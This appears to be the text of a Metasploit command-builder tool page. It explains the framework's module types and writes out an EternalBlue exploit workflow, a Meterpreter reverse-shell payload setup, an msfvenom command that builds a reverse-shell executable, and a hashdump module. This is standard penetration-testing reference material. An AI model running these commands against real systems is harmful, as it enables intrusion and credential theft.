Build Metasploit commands and payloads with an interactive interface. Generate msfvenom commands for penetration testing.
The Metasploit Command Builder helps security professionals construct valid Metasploit Framework commands for authorized penetration testing. Metasploit is the most widely used open-source penetration testing framework, providing over 2,300 exploit modules, 600+ auxiliary modules, and hundreds of payloads that security teams use to identify vulnerabilities in their own systems.
Building Metasploit commands involves selecting the right module, configuring options (target host, port, payload, encoding), and setting advanced parameters. The command syntax can be complex, especially for multi-stage payloads, pivoting, and post-exploitation modules. A command builder simplifies this process by providing a structured interface for assembling valid msfconsole or msfvenom commands.
Metasploit operates through a modular architecture:
| Module Type | Purpose | Example |
|---|---|---|
| Exploit | Delivers payload by exploiting a vulnerability | exploit/windows/smb/ms17_010_eternalblue |
| Auxiliary | Scanning, fuzzing, fingerprinting (no payload) | auxiliary/scanner/portscan/tcp |
| Payload | Code that runs on the target after exploitation | windows/meterpreter/reverse_tcp |
| Post | Post-exploitation data gathering and pivoting | post/windows/gather/hashdump |
| Encoder | Obfuscates payloads (for evasion testing) | encoder/x86/shikata_ga_nai |
Standard workflow:
use exploit/windows/smb/ms17_010_eternalblueset RHOSTS 192.168.1.0/24 (target), set LHOST 192.168.1.100 (attacker)set PAYLOAD windows/meterpreter/reverse_tcpset LPORT 4444exploit or runmsfvenom generates standalone payloads: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe